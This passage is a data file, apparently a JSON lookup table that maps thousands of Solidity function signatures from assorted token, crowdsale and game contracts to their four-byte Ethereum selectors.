"maskpot()": "0x6c24e2db", "transferFromTrustedContract(address,uint256)": "0xcf034b1d", "setFundingRules(address,uint256,uint256,uint256,uint256,uint256)": "0x47ad396b", "getEntityState(bytes32)": "0xe490c513", "dividendsRound()": "0x1d05bcb3", "indexToAddress(uint256)": "0xe61ca819", "sendEtherManually(address,uint256)": "0x659d7aaa", "verificationRate()": "0x7af8b87d", "teamAndAdvisorsAllocations(address)": "0x9c225b33", "valueInUSD()": "0xe85de8e7", "functionSix(uint256,uint256,uint256,uint256)": "0x46f24c6a", "etherInContract()": "0x5df86d29", "nameValue()": "0xb0799375", "preSaleRate()": "0xd833dbe9", "multiMintPreIco(address[],uint256[])": "0x54622cef", "getSaleFinancialData()": "0xc5ae7570", "maxHopefulsNumber()": "0x6a1ecbbf", "isAppCode(uint32)": "0x78a62e9d", "holderNumber(address)": "0xfb6e6558", "arrIdx2lost(uint256)": "0x7c513a21", "refundToBuyers()": "0xe1e87c28", "getTokenHolders()": "0x876b1566", "developer_string_D(string)": "0xc1e68e4b", "registerGuide(address)": "0x3a57e698", "lastBlock_f19Hash_uint256()": "0xf79480f8", "isAffiliate()": "0x44f75cbd", "oraclizePrice()": "0x726bd6bf", "draw_number()": "0x6dc043d7", "reserveManyTokens(uint256[],uint256)": "0x8bad8d8e", "canSell(address,uint8,uint8)": "0x7dfa0b3f", "isInFinalState()": "0x39e3407b", "PRE_SALE_1WEEK_BONUS()": "0x18e7eb4b", "validAddresses(address)": "0xb91e4087", "pricePerToken()": "0x7b1b1de6", "TOKEN_RATE_20_PERCENT_BONUS()": "0xfd414a29", "setTreasurer(address,bool)": "0xd06f9734", "player4()": "0x114f0e49", "citadelTransfer(address,uint256)": "0x7132d337", "isInLockStage()": "0xba399ad2", "transferWhiteList(address)": "0x02e4ef66", "fundWallet1()": "0x4034cfed", "ICOSaleEnd()": "0x8ff6c8dd", "withdrawEther(uint256,uint256)": "0x2650a47c", "depositFiat(address,uint256,bytes32)": "0xeeee7cc0", "raffleLimit()": "0x18643d37", "allowedAmountToTransferToPool()": "0x5245849e", "capInitialized()": "0x07a8df44", "finishLastCount()": "0x29a2c27b", "BONUS_MID_QTY()": "0xe6072d5a", "everyBidFee()": "0xd311b44d", "phase6Price()": "0x86f19dde", "totalTokensPreICO()": "0x98a30f76", "finishBonusPeriod()": "0xde72cab0", "BONUS_PRESALE()": "0x05502a62", "getCost()": "0xbd3e19d4", "MIN_LEADER_FRAC_BOT()": "0xfd4c5c9f", "bitCrystalEscrow()": "0x6dc214af", "allEther()": "0x38813ee0", "totalRegistrationBonusAmount()": "0xdd09e13c", "fiat()": "0xa50edca0", "minimumTokenThreshold()": "0x4c3ef6dc", "FOUNDER_FUND_3()": "0x33016c6a", "REFERRAL_REWARD_PERCENTAGE()": "0x62ffb195", "daoMultisig()": "0xc0d0aa69", "dateOfBonusRelease()": "0x41203243", "funderBalance_()": "0x597fef79", "small()": "0x6cf3c25e", "allInvestments()": "0xd9b6aec4", "ORIGINAL_IPFS_HASH()": "0x291f5a1f", "finalizePreIcoDate()": "0xf766658d", "decimals_multiplier()": "0xe8046759", "founderSupply()": "0x9694f039", "million()": "0x4e9c6b1f", "dragon()": "0xd972ea3e", "firstAddress()": "0xf697ddb2", "MINBET()": "0x245678d6", "soldTotal()": "0xbaa9da15", "totalAxiesRewarded()": "0xf3436873", "balancesContract()": "0x4a3d72a1", "totalSoldTokenCount()": "0x6673d5c6", "uniquenessIndex()": "0xea79f33d", "_dev()": "0xe79ffa11", "builder()": "0xd7e84fbf", "trusteeVaultAddr()": "0xc5a9833e", "CONFLICT_END_FINE()": "0x6f9d257d", "cancel_face_proof_request()": "0x0a41dfee", "discountedIcoTokensSold()": "0x027bfab4", "getJntBeneficiary()": "0xc2608314", "ICO_BONUS1_RATE()": "0x4d392341", "eth_is_seeded()": "0x3bbb44ca", "luckyNumber()": "0xbf205ebc", "MINIMAL_PRE_ICO_INVESTMENT()": "0x7a4e320c", "refreshLockUpStatus()": "0x90e2d4cc", "strategicAllocated()": "0x5bf95e43", "nextForkName()": "0x54cfe7d0", "referralTokensAvailable()": "0x1d718288", "hardCapInEther()": "0x64e36d04", "producedGoldCaps()": "0x30e6c333", "startTimestamp()": "0xe6fd48bc", "hotPotatoPrize()": "0x6dda1291", "playerTokenAddress()": "0xdaac518a", "grand_factory()": "0x1419c3f3", "timelock()": "0xd33219b4", "DEFAULT_PRESALES_DURATION()": "0xe326e6ad", "referralPercentage()": "0x96ea8b9c", "startIcoOne()": "0xa0695fc2", "exceed()": "0x0b181567", "AdvisorsAmount()": "0x6a3d2a15", "startEarlyBird()": "0x4c05df98", "ONE_PERCENT()": "0xbb2eb4d2", "managerSecondary()": "0xee70f392", "GetInvestedAmount()": "0x5a70fe72", "pinakion()": "0xfbf405b0", "tokenChanger()": "0x387a76ce", "foundersTokensWalletMaster()": "0x5d891d12", "ALLOC_BOUNTIES()": "0x54ecd994", "buildHouse()": "0xf6fb6ecf", "pausedUntil()": "0xda748b10", "dateEndIco()": "0x4f5b3318", "isFrozen()": "0x33eeb147", "bitcoinSaleRate()": "0x05026317", "address4()": "0xa1c2f644", "BONUS_3_DAYS()": "0xdc4ece27", "model_accuracy_criteria()": "0xa8f56600", "vc2Wallet4Pct()": "0xf3635a02", "maxAllProfit()": "0x426f5531", "minimumCost()": "0xbb424892", "deathData_a7()": "0x5efb4dc5", "totalOwned()": "0x17997878", "ecoSystemFund()": "0x3b87ec2d", "goldListPeriod()": "0x5fb42c59", "STARTING_SNAIL()": "0xa694dabd", "kyberNetworkProxyContract()": "0x785250da", "sellPriceInWei()": "0xd5a81428", "benefactorsBalance()": "0x1a4a1a6c", "chainIdValue()": "0x15613d9f", "whitelist()": "0x93e59dc1", "agingTime()": "0x3fc50b92", "ethStore()": "0x1cb64196", "projectDescription()": "0x755f047b", "ada()": "0xfbef957b", "totalTipForDeveloper()": "0x96c2d4c9", "tokenVault()": "0x5bc789d9", "priceToBuyInFinney()": "0x8817a198", "deadlineBlockNumber()": "0xbe8db3cf", "marketingTeamTokens()": "0xe2948c21", "stage_Discount()": "0x14b5202c", "euroCentsInOneEther()": "0xd81efdc4", "stepTwoLockEndTime()": "0xa53d5205", "get_planet_price()": "0x41224405", "VaultCountPerProcess()": "0xbb256f68", "refundPct()": "0xe9b991cc", "coreTeamTokenSupply()": "0x84ff2e45", "initialisation(address,address)": "0xecedf7b2", "emergency_withdraw(uint256)": "0xec46bf8f", "substract_individual_shares(uint256)": "0x4c51b021", "reset_individual_shares(address)": "0x3c0e6adc", "freeze_pool(bool)": "0x12be78d1", "oracle_call(uint256)": "0xf3f70674", "calculate_total_shares(uint256,uint256)": "0x9aca6e2e", "_mint_with_uri(address,uint256,string)": "0xf4a8a699", "updatetoken(uint256,string)": "0x03ad4be3", "setRole(uint8,address)": "0xf2e12a39", "sendFeeIfAvailable()": "0xa8d9e8a3", "calculateTotalSupply(uint256)": "0x616dcf0c", "updateFinishTime(uint256)": "0x96dbb486", "handleLuckyPending(uint256)": "0x2391ddf3", "getDealerAndLuckyInfo(uint256)": "0x379995c3", "SAMURAI()": "0x942273bd", "isPromo(address,address)": "0xaf837832", "firstMintRound0For(address[],uint256[],uint8[])": "0xde644ebd", "setPromo(address[],uint8[])": "0x90f50cd9", "KVC(uint256,string,uint8,string)": "0x3c8161c5", "kvcAdd(uint256,uint256)": "0x4c22a8d1", "kvcSub(uint256,uint256)": "0x73bc8b2f", "kvcDiv(uint256,uint256)": "0x8dffe343", "kvcMul(uint256,uint256)": "0xec7b2843", "getVotesForItemFromVoterIndex(uint256,uint256,uint256)": "0x4d79ddb2", "Metadium()": "0xc13992b4", "Redhorse()": "0x406499d2", "LPCoinToken()": "0xb80ced14", "_confirmOneSell()": "0x8c0c0368", "_confirmOneBuy()": "0xa6934950", "cancelOneSell()": "0x00297671", "weiToShare(uint256)": "0x4556611e", "shareToWei(uint256)": "0x1a70388f", "setBuyComissionUnits(uint256)": "0x928993dd", "setSellComissionUnits(uint256)": "0x8b00299b", "setPriceUnits(uint256)": "0xf0342179", "setBuyComission(uint256)": "0x5bfface4", "setSellComission(uint256)": "0x6529abba", "shareTransfer(address,address,uint256)": "0xb9dedc6a", "unhold(address)": "0x730a0d80", "hold(address)": "0xa7e21e80", "fireAdmin(address)": "0x4925480e", "empowerAdmin(address)": "0xadc8b4cf", "AobcToken()": "0x307f35e6", "IOReceipts()": "0xc7b27a25", "TokenPK(uint256,string,uint8,string)": "0xa9e30f96", "mint(address,uint256,uint256,uint256,uint256)": "0xf92883a2", "setOtherFounder(address,uint256)": "0x88dfee60", "iterate(string)": "0x93741a3e", "setPlayConfigs(uint256,uint256,uint256)": "0xe09874c0", "setJoinFee(uint256)": "0xceeb7066", "endRound(uint8)": "0x2c792276", "getKittyPower(uint256)": "0xa0f04c38", "joinPillarCore(uint256,uint256,uint8)": "0xe3380b7e", "joinPillar(uint256,uint8,uint256)": "0xc4818ae1", "joinPillarWithEarnings(uint256,uint8,uint256)": "0xf77dff06", "getPlayerRoundsKitties(uint256,uint256)": "0xac509050", "getPillarRoundsKitties(uint8,uint256)": "0x9480cd1a", "CAPToken()": "0xe775f01f", "getTradingInfo(uint256)": "0xcc4999ea", "getLendingInfo(address,uint256)": "0x4afd8a19", "getLendingObjId(address,uint256)": "0x7d326635", "getBorrowInfoByIndex(uint256)": "0x9e5b241a", "getSellingInfoByIndex(uint256)": "0x488f1e43", "getTotalLendingItem(address)": "0x1008a2a5", "getSellInfo(uint256)": "0xe9bc63f7", "getBorrowInfo(uint256)": "0x0e137368", "getBorrowBasicInfo(uint256)": "0xe40906ed", "isOnTrade(uint256)": "0xff510ad8", "isOnLent(uint256)": "0x3a060bc9", "isOnSell(uint256)": "0x542c8f37", "isOnBorrow(uint256)": "0x9cbb165e", "removeItemLendingList(address,uint256)": "0x770c6bde", "addItemLendingList(address,uint256)": "0x50048174", "addBorrowingItem(address,uint256,uint256,address,bool,uint256,uint256)": "0xa18e0ce4", "removeBorrowingItem(uint256)": "0x29da3b4d", "addSellingItem(uint256,uint256,uint256)": "0xf797ac0e", "removeSellingItem(uint256)": "0x067002ce", "ZorffToken()": "0x605c0209", "technik()": "0x6f069cfe", "VilzToken()": "0x707ba39e", "Cryptolotto10Minutes(address,address,address,address)": "0x71dfc116", "Spc(uint256,string,string)": "0x05f766a4", "ROE()": "0x187ed86e", "AccommodationCoin()": "0x1960d761", "unFreezeUser(address)": "0xe5449600", "ITTM()": "0x4346aa58", "ROD()": "0xe95f72e3", "Aeroneum(address,address)": "0xcac92fe1", "INCRYPTHEDGE(uint256,string,string)": "0xb055a62a", "eastadscredits()": "0x705bbfe6", "NineStandardToken(uint256,string,uint8,string)": "0xb0949833", "BytomGoldToken()": "0x29e5dab7", "HLChain()": "0x363c76f3", "Menu10(address)": "0x91ecda3c", "Menu03(uint256)": "0x78fca301", "Menu08(uint256)": "0x8476f105", "Menu02(address[],uint256)": "0x864af3f4", "Menu01(address,uint256)": "0xce972f33", "Menu07(address)": "0xab5aea81", "viewAuthorized()": "0x1d75a4b9", "_createEstate(int256[],int256[],address,string)": "0xe083a1b5", "createEstateWithMetadata(int256[],int256[],address,string)": "0x881eeaa5", "createEstate(int256[],int256[],address)": "0xca8a2c08", "setEstateRegistry(address)": "0x8de74aa1", "transferManyLandToEstate(int256[],int256[],uint256)": "0xf5f83a61", "transferLandToEstate(int256,int256,uint256)": "0xf9cbec43", "DewToken()": "0x8b12dc23", "NotifyMe(address,address)": "0x1226be3e", "GetAskingTokenDecimal()": "0x84e8b36e", "SCToken()": "0x3faaffdb", "DolyToken()": "0x41388c71", "_calculateTotalLockedBalance(address)": "0x313186e7", "_calculateLockedBalance(address,uint8)": "0x5d8aef9f", "_calculateLockedPercentage(uint8)": "0xc99db1ba", "_getAppliedPolicyIndex(address,uint8)": "0x7ecef543", "getUserPolicy(address)": "0x761d9e68", "removePolicyFrom(address,uint8)": "0xb411e54f", "modifyPolicyTo(address,uint8,uint8)": "0xdac32ba9", "modifyPolicyAttribute(uint8,uint256,uint8)": "0xf85ef43b", "removePolicyAttribute(uint8,uint256)": "0xb4ed8bf8", "addPolicyAttribute(uint8,uint256,uint8)": "0x0220f662", "setKickOff(uint8,uint256)": "0x7f0ed037", "getPolicy(uint8)": "0x04f08b55", "removePolicy(uint8)": "0x8db9c13c", "addPolicy(uint8,uint256[],uint8[])": "0x6781cc04", "distributeWithPolicy(address,uint256,uint8)": "0x7c75c1b4", "checkbalance(address)": "0xe83029bb", "setaddress(address,address)": "0x7708e321", "setmessager(string)": "0x34a6301e", "doesPaymentExist(address,address)": "0xb5f9ca19", "isValidDeletion(uint8,bytes32,bytes32,string,address,address)": "0x0323aa55", "calculatePMAFromFiat(uint256,string)": "0x5aad7c56", "executePullPayment(address,string)": "0x65826666", "deletePullPayment(uint8,bytes32,bytes32,string,address,address)": "0x6e635673", "registerPullPayment(uint8,bytes32,bytes32,string,string,address,address,string,uint256,uint256,uint256,uint256,uint256)": "0x9072d58a", "setRate(string,uint256)": "0xc84cda0f", "removeExecutor(address)": "0x24788429", "addExecutor(address)": "0x1f5a0bbe", "getDoneRegistrationAmount(address)": "0x3298caa3", "updateRegistrationState(bool,uint256)": "0x2d040add", "newRegistration(address,uint256)": "0x255eac5c", "getDonebountyAmount(address)": "0x46b33bc2", "bountyTokensBatch(address[],uint256[])": "0xe395983a", "bountyTokens(address,uint256)": "0xe572dee5", "updateAirdropStageState(string,bool)": "0x01bebf36", "getDoneSelfDropAmount(address)": "0x22082c72", "updateSelfDropStageState(uint256,uint256,uint256,uint256,uint256,uint256)": "0xb9844d6f", "updateSelfDropStageState(string,bool)": "0xbeb318a0", "SelfDropTokens(address,uint256)": "0x6f941290", "getStageTotal()": "0xd4d6cdc4", "ChangeDeadLine(uint256,uint256,uint256,string,uint256)": "0xd19e6cf0", "setPrices(uint256,uint256,bool)": "0x935bb767", "addVpf(bytes32,uint256,uint256,uint256,uint256,int256[])": "0x79538e47", "TemplateToken()": "0xde7086f6", "buyTickets(uint256,uint256)": "0x8627df46", "distributeCollectiblesTo(address)": "0x625295fd", "distributeTo(address)": "0x6cd2ad56", "setMaximumNonWhitelistAmount(uint256)": "0x1c25331d", "checkReceivedUser(address)": "0xb7886b37", "KAL5Token()": "0x9e25ec01", "releaseDivTokens()": "0x670f4bd4", "createItem(uint256,uint256,uint256,uint256)": "0xeae3d479", "_setTypeValue3(uint256)": "0x20c21ba5", "getTypeValue(uint256)": "0x1faae8b3", "OneKeyToken(uint256,string,uint8,string)": "0x59970a08", "payback(uint64,address[])": "0xa707fc81", "withdraw(uint64,address[],uint256)": "0x99ac4569", "updateEscrow(uint64,uint256,uint256)": "0x9f69b5a0", "initiateEscrow(uint64,uint256,uint256,address,address,address,address)": "0x508343d6", "PBSU()": "0x981c9e07", "kemnagToken()": "0xcf4baa4b", "weiToUSD(uint256)": "0xd2df254c", "testrevert()": "0xdf93c9aa", "call_contract(address,address)": "0xbc1c002c", "DATP()": "0x8c59fba0", "fechVoteResultForCandidateByStage(address,uint256)": "0x9d327229", "fechVoteNumForCandidateByStage(address,uint256)": "0x0e4a4e8c", "fechAllForCandidateByStage(uint256)": "0x0965b0b7", "fechVoteInfoForVoterByStage(address,uint256)": "0x01c1de96", "fechVoteMainInfoByStage(uint256)": "0x6eb1e09a", "fechAllCandidates(uint256)": "0x83fa07fd", "cancelVoteForCandidateByStage(address,uint256,uint256)": "0xd3c567c1", "changeStageBlock(uint256)": "0x8b073bb3", "changeEthPrice(uint256)": "0x16829de5", "Titanization()": "0x4db208ba", "isActivate(uint256)": "0x1c7a08ef", "_setBigWinner(address,uint256,uint256)": "0x886db803", "_calcEndTime(uint256)": "0xf3fac412", "_setAllKeys(uint256,uint256)": "0x82e77165", "_setUserInfo(address,uint256,uint256)": "0x8583b1b8", "_setPotValue(uint256,uint256)": "0xb6755038", "CheckOut(uint256)": "0x2c276699", "_newGame(uint256)": "0x2ae8284a", "_checkoutCost()": "0x441e354c", "_calcCheckoutTime(uint256)": "0x7ce2d863", "_updateKeyPrice(uint256)": "0x3c77e474", "getUserKeys(address)": "0x32c990b4", "getBigWinner()": "0x506d54c7", "getAllKeyNum()": "0x7ff44a91", "totalreleaseblances()": "0x5a593a6e", "release_by_manager()": "0xa9120f6d", "secondCheckpoint()": "0x67d41253", "newEmployeePoolPromille()": "0x9dc43f2d", "zgetOwner()": "0x7d451aa7", "oneavl()": "0xe65e73e2", "timeFreezeTeamTokens()": "0xe27f3853", "omg()": "0xb24374a2", "exploreETHFee()": "0x2c421074", "minForNewTopic()": "0x4de90f34", "TYPE_HASH()": "0x64d4c819", "frenzyContract()": "0xeafc99a7", "prePreIcoEndAt()": "0xceefbbd6", "t4tToken()": "0x27796092", "PS_PRICE()": "0xfd4d603c", "isAllFrozen()": "0x011a44bf", "hasFiveStepWithdraw()": "0x7ca64683", "makeWager()": "0xaefd0299", "countWinners()": "0xa565efff", "initialTimestamp()": "0xd6d14171", "changeAmount()": "0xa8ea8554", "reconciliationDateSet()": "0xdc533342", "neo()": "0x44350d5f", "cap_()": "0x07fb363a", "INITIAL_TOTAL_SUPPLY()": "0xc04fcad8", "TEAM_ADDRESS()": "0x351509a8", "min_pay_wei()": "0x8f0165e1", "CoreMediator()": "0xa2c52c4d", "Resume()": "0x490d6d11", "removeOracle()": "0xdab46553", "jackpotToken()": "0x8ec9925e", "poolSale()": "0x572c62ca", "joyToken()": "0xa64968ac", "feeNumerator()": "0xe86dea4a", "reduceDiv_()": "0x9a78afc6", "deathData_f4()": "0x5b0b02ec", "lister()": "0x2cdc1c74", "ethExchangeWallet()": "0x631c42ae", "gasForPBTT()": "0x28effe67", "SAC()": "0x4e028c67", "crcWithdrawAccount()": "0x807d782e", "ICO_SINCE()": "0xe113c6fd", "playersShareAllocation()": "0xb3f2fa99", "owner_fee()": "0x14ce4059", "quarterlyWithdrawable()": "0x34d8521b", "aventus()": "0x0674fde4", "preSale2Finished()": "0xacd590d3", "priceStep6()": "0x7ec80c27", "getBetArr()": "0x32f2129a", "startIncentiveDistribution()": "0x5dc5aefe", "ico3Max()": "0x0ede050b", "mintDone()": "0xbd088724", "secondLevelPrice()": "0x0df07980", "bonus_for_add_stage()": "0x57451104", "bonusUnlockTime()": "0x1d3f90c6", "accrueTeamTokens()": "0x5bbdc7c5", "viewNumberOfMemories()": "0xefcf095c", "purchasableTokens()": "0xe2fdf807", "currentStateSales()": "0x560f5d4b", "get_term_deposit_end_date()": "0xf5d17f10", "getIcedAddresses()": "0xf6e898b0", "firstPartOfTeamTokensClaimed()": "0x321b3157", "ballotEncryptionSeckey()": "0x245b565d", "COMMUNITY_SALE_START()": "0x96ec7114", "ranked()": "0xdbd42da5", "ETH_TLD_NODE()": "0xfdee38a9", "voteClose()": "0xc6279ab1", "listActive()": "0xdb25b407", "secondRoundMayEnd()": "0xe931f1ba", "totalBuys()": "0x6c7f3f17", "soldTokensPreSale()": "0xd893b9f1", "potTarget()": "0x96f17aa5", "icoReferralBonusInPercentage()": "0x5872282d", "totalMember()": "0x77ee311c", "startTokenPriceWei()": "0x7bbfb0bd", "whitelistStartBlock()": "0xcc308a54", "minWeiWhitelistInvestment()": "0x562cc70c", "minimumTransferInWei()": "0xd1ba656b", "DXC()": "0x90836822", "frozenReserveTeamWallet()": "0xfbc3d0ef", "pre_endTime()": "0xa2a0d0fc", "prebridge()": "0x4ab788cb", "weiMinSaleIco()": "0x3e118f1f", "ico1cap()": "0xb2984858", "weiRaisedIco()": "0x91d15a91", "totalReward()": "0x750142e6", "StorageFund()": "0x0a756f09", "zGetGameID()": "0x1a3a67d8", "STARTING_ANTHILL()": "0x5b475e22", "ownerComission()": "0x98a322ae", "targetFeePeriodDurationSeconds()": "0xfbe093dc", "transferableTime()": "0x4b41f4df", "oraclizeCallbackGas()": "0x4f0eaf96", "feesPerMillion()": "0x393cb7e3", "fightStartTime()": "0x40b5ce01", "ProposalsEntity()": "0x919baade", "finalizeAgent()": "0x21d5c0f6", "ownedContract()": "0xbc467a3e", "setICO1Phase()": "0x2593ed21", "tok()": "0x4ab74a1e", "randNonce()": "0x61e01356", "demurringFeeNum()": "0xa476f3d3", "killTokens()": "0x2ce90c11", "getTokenAddHold()": "0xce389e53", "maxWeiTier0()": "0x6869fb30", "controlTime()": "0x11115e38", "InitialBlockCount()": "0x6ee4b475", "argCurMax()": "0xac4c8bf3", "GAS_PRICE_LIMIT()": "0xe7b172ed", "pr0coinAddress()": "0xd8d9159d", "Maxsupply()": "0xbe4299a6", "_price_token()": "0xf4508082", "businessPercentage()": "0x7249733c", "TokenAmountToPay()": "0xa1007e68", "ALLOC_SALE_PRIVATE()": "0x6d022003", "secretaryGeneral()": "0xc90755e2", "Softcap()": "0xf584bf09", "requiredProgressOfPreviousDungeon()": "0x0ec89f2b", "level_4_percent()": "0x49e0dada", "bVideoCost()": "0x4d13c565", "TOKEN_SUPPLY_LIMIT()": "0x292005a2", "pvpPaused()": "0x7ced55c2", "AWD_SHARE()": "0xa1acd4b2", "minHpDeducted()": "0xcfa83079", "oracleQueryType()": "0x70f4c18c", "addr_forge()": "0xfab55a49", "teamWallet1()": "0x13ca43a0", "midasAdvisorOperateMarketingAddress()": "0xa5d8b72b", "mainSaleSupply()": "0x8a306c21", "summPrivateSale()": "0xe81e935a", "CLIFF_DURATION()": "0xb3daa652", "MAX_INTEREST_AMOUNT()": "0x7dfce6d7", "isDiscount()": "0x4e140274", "isItIco()": "0x25cb6303", "maxPower_()": "0x6042fbe1", "maxAirDrop()": "0xca4a0298", "Chain1()": "0xfd4faee0", "maxStakeHolders()": "0x692dfe8e", "etherSoftCap()": "0x6ffa1257", "defrostOwner()": "0xfc143f2b", "ico_tokens()": "0xf2bff63b", "leftTokens()": "0x1ea906b5", "firstYearGameMiningTokenCap()": "0x69a75868", "biddingPeriod()": "0x5f8909bd", "outstandingEther()": "0x548b273a", "cutoff()": "0x54b02ba4", "SingularDTVWorkshopFee()": "0x58c62b12", "maxProportion()": "0x3ef5aee9", "isStoped()": "0x191797df", "withdrawFoundersTokens()": "0x2b07682a", "receiverWithdraw()": "0x70a6c4bb", "staff_4()": "0xdd242fa4", "reserveDistribute()": "0x8da2a2a1", "tokensIssuedIco()": "0xd912ebb2", "EARLY_CONTRIBUTOR_VESTING_PERIOD()": "0xf3d7e464", "distributeCoins()": "0x3f5750c6", "ClosingTimeForCloning()": "0x4979c012", "raindropAddress()": "0x03960631", "kin()": "0x9743efe5", "drawPeriod()": "0xe846e7c0", "metadataUrlPrefix()": "0xc7047fa7", "bonusEndDate()": "0xadaabaaa", "set_bonus_received()": "0xeb03085b", "forPresale()": "0xf7c8a091", "PARSEC_CREDIT_DECIMALS()": "0xf706b814", "LifeFactor_iv()": "0xcb207166", "min_bid()": "0x0e7ebce4", "dailyAuctionStartTime()": "0x49b11f24", "selfDestructInitiated()": "0xb8225dec", "tokensCreationVIPsCap()": "0x3d637ebe", "fourthPriceTime()": "0x5302a136", "Sold()": "0xe04a8c08", "preSaleEnd()": "0x6bc64e0f", "minQuorumDivisor()": "0x674ed066", "ico_startdate()": "0x203a318f", "REWARD_NUM()": "0x0ee7968e", "discountedTokensPerDollar()": "0x0e5263fa", "_soldOutside()": "0x84e8a7df", "newTechSupport()": "0xe3d13592", "auctionSize()": "0xeed65c11", "overRaisedUnsend()": "0x962d0c72", "n_domains()": "0x1e9da16a", "highestAddressReserving()": "0x0e0d3567", "maxAttempt()": "0x10d5e276", "winMultiplePer()": "0x8c088d98", "STARTING_POOH()": "0xe0d29d38", "gasprice()": "0x6ec232d3", "endDistribution()": "0x64c76117", "techAccount()": "0x35972f46", "avgSalesToCount()": "0xe56e4776", "reqfee()": "0xdaac1f64", "last_forwarder_created()": "0x2ee5d2e3", "deathData_f17()": "0xfb719113", "notforked()": "0xca2dfff1", "bidEMONTMin()": "0xaf9b6bd2", "commission2()": "0x415f9498", "dai()": "0xf4b9fa75", "twoStepRate()": "0x48bc3e2a", "TOKEN_ESCALE()": "0x5cf858aa", "configured()": "0x8772a23a", "transferToContract(address,uint256,bytes)": "0x3f35d033", "transferToAddress(address,uint256,bytes)": "0x35e9d83b", "getAllowance(address,address)": "0x0af4187d", "setAllowance(address,address,uint256,uint256)": "0x0dd84392", "decrease(address,uint256)": "0xf27ac4d9", "increase(address,uint256)": "0x522afaec", "CollateralToken(string,string,uint256,uint8)": "0x87da3208", "bla()": "0xf07494a0", "senderIsProvider()": "0x9e4bec3f", "replace(uint256,uint256)": "0xe81cf24c", "append(uint256)": "0xe33b8707", "chargeQuarterlyRate(bytes32,address)": "0x823287b7", "chargeMonthlyRate(bytes32,address)": "0xa7d77305", "chargeWeeklyRate(bytes32,address)": "0xc0cd2e32", "chargeDailyRate(bytes32,address)": "0x9d989b20", "rentRentable(bytes32,address)": "0xcb293e7a", "changeQuarterlyRate(bytes32,uint256)": "0x0adeb700", "changeMonthlyRate(bytes32,uint256)": "0x57e984cf", "changeWeeklyRate(bytes32,uint256)": "0xa240d8ad", "changeDailyRate(bytes32,uint256)": "0x432a805b", "addRentable(bytes32,uint256,uint256,uint256,uint256)": "0x9af917f4", "RentableProvider(string,string)": "0xf9b18e72", "getPreICOBonus()": "0xf7c5f4b6", "getLargePaymentBonus(uint256)": "0xd4f6aa98", "iaOnInvested(address,uint256,bool)": "0x550052b5", "amIOwner()": "0x4e4ab830", "createMorePaymentChannels(uint256)": "0x10e96b3c", "STQPreICOBase(address)": "0x555ae2c6", "Test2(uint256)": "0xcad93688", "a(uint256)": "0xf0fdf834", "getBonus()": "0x8bdff161", "withdrawFundInsurance()": "0x978ab53b", "beManagerInsurance()": "0x6d3de7ea", "fundInsurance()": "0x12eacf4b", "claimInsurance(bytes32)": "0xe0bc6c44", "applyInsurance(bytes32)": "0xf020d093", "InsurContract()": "0x8ca6c287", "setValueParam(uint256)": "0x3cb579c1", "requiresInitialization()": "0x98a595a5", "Storage(uint256)": "0xe9ba2e9b", "ForceEther()": "0xbe6ad6d2", "something()": "0xa7a0d537", "left99(uint256)": "0xb114b96c", "right99(uint256)": "0x49d4a344", "left98(uint256)": "0xed6302be", "right98(uint256)": "0xc319a02c", "left97(uint256)": "0x67b886e8", "right97(uint256)": "0xf80f44f3", "left96(uint256)": "0xf32fe995", "right96(uint256)": "0x0e20ebe2", "left95(uint256)": "0x74552650", "right95(uint256)": "0xf0ed14e0", "left94(uint256)": "0x8fdc24ba", "right94(uint256)": "0x4c2fe456", "left93(uint256)": "0xb731e848", "right93(uint256)": "0xc569bae0", "left92(uint256)": "0x69d77740", "right92(uint256)": "0x67e902c7", "left91(uint256)": "0x8b9ff6b6", "right91(uint256)": "0xa5a83e4d", "left90(uint256)": "0xe3da5399", "right90(uint256)": "0x6e978d91", "left89(uint256)": "0xaad62da2", "right89(uint256)": "0xfed3a300", "left88(uint256)": "0xaaf3e4f4", "right88(uint256)": "0x31db9efd", "left87(uint256)": "0x9740e4a2", "right87(uint256)": "0xe70addec", "left86(uint256)": "0xeecd2789", "right86(uint256)": "0xfd720090", "left85(uint256)": "0x738a2679", "right85(uint256)": "0x3ff11c8b", "left84(uint256)": "0x455df579", "right84(uint256)": "0x38c68f8f", "left83(uint256)": "0xfbd3c51a", "right83(uint256)": "0x6c3b6591", "left82(uint256)": "0x5dab2e0f", "right82(uint256)": "0xc028c674", "left81(uint256)": "0xca9efc73", "right81(uint256)": "0xdd946033", "left80(uint256)": "0xd90b02aa", "right80(uint256)": "0xdda51424", "left79(uint256)": "0x9be07908", "right79(uint256)": "0xe6c0459a", "left78(uint256)": "0xbbececa9", "right78(uint256)": "0xc2385fa6", "left77(uint256)": "0x1f69aa51", "right77(uint256)": "0x9d451c4d", "left76(uint256)": "0xf8bc0505", "right76(uint256)": "0x91d43b23", "left75(uint256)": "0xde661217", "right75(uint256)": "0x6e54181e", "left74(uint256)": "0x6b7ae8e6", "right74(uint256)": "0xd7ead1de", "left73(uint256)": "0xbbcded7a", "right73(uint256)": "0x4eb166af", "left72(uint256)": "0x4eaaad7b", "right72(uint256)": "0xebb6c59f", "left71(uint256)": "0x44e86b2f", "right71(uint256)": "0x9d8ee943", "checkWeather()": "0x9b17b2dc", "DoorLock()": "0xb8cd0b94", "submit(string)": "0xd99a8dc3", "decideSplit(uint256,uint256,string)": "0x1123cdd9", "createDispute()": "0xfcdf9750", "confirmImperfectReception(uint256)": "0xf8a6fca8", "changeSellerProposedValue(uint256)": "0xdc5c9677", "cancelSellOffer()": "0xc7d5b6f1", "confirmPerfectReception()": "0xda037fd1", "ArbitratedBuyDeposit(address,string)": "0x86fb8715", "setTokenAllowance(address,uint256)": "0x8a4fbead", "init(address[5],uint256[6],uint8,bytes32,bytes32)": "0x8eb066ce", "SimpleCrowdsale(address,address,address,address)": "0x8571baff", "callScheduler()": "0x799c8ef2", "theanswer()": "0x720edd13", "getNewForkReputationGoal()": "0xfe70f417", "setNewData(uint256)": "0x582527f8", "ExampleUpgradeable23Token(address,uint256,bytes32,bytes32,uint256)": "0xebb240ef", "getContractsByStatus(address,uint256,uint8)": "0x51c3934f", "getJobInvoicesByStatus(address,uint256,uint8)": "0xf96803d3", "getEmployerJobsForFreelancerInvite(address,address,address)": "0xbbbe1390", "getEmployerJobsByStatus(address,address,uint8)": "0xf4f724b3", "getSponsorableJobs(address)": "0xcc2e15cc", "searchJobs(address,uint256,uint256[],uint256[],uint8[][4],uint8,uint256[],uint256[],uint256)": "0xa718f4b3", "hasEmployerMinRatingsCount(address,address,uint256)": "0xad7e262c", "hasEmployerMinRating(address,address,uint256)": "0x17b65ae6", "hasMinCreatedOn(address,uint256,uint256)": "0xf86e898c", "hasLanguage(address,uint256,uint256)": "0xd5c2ee21", 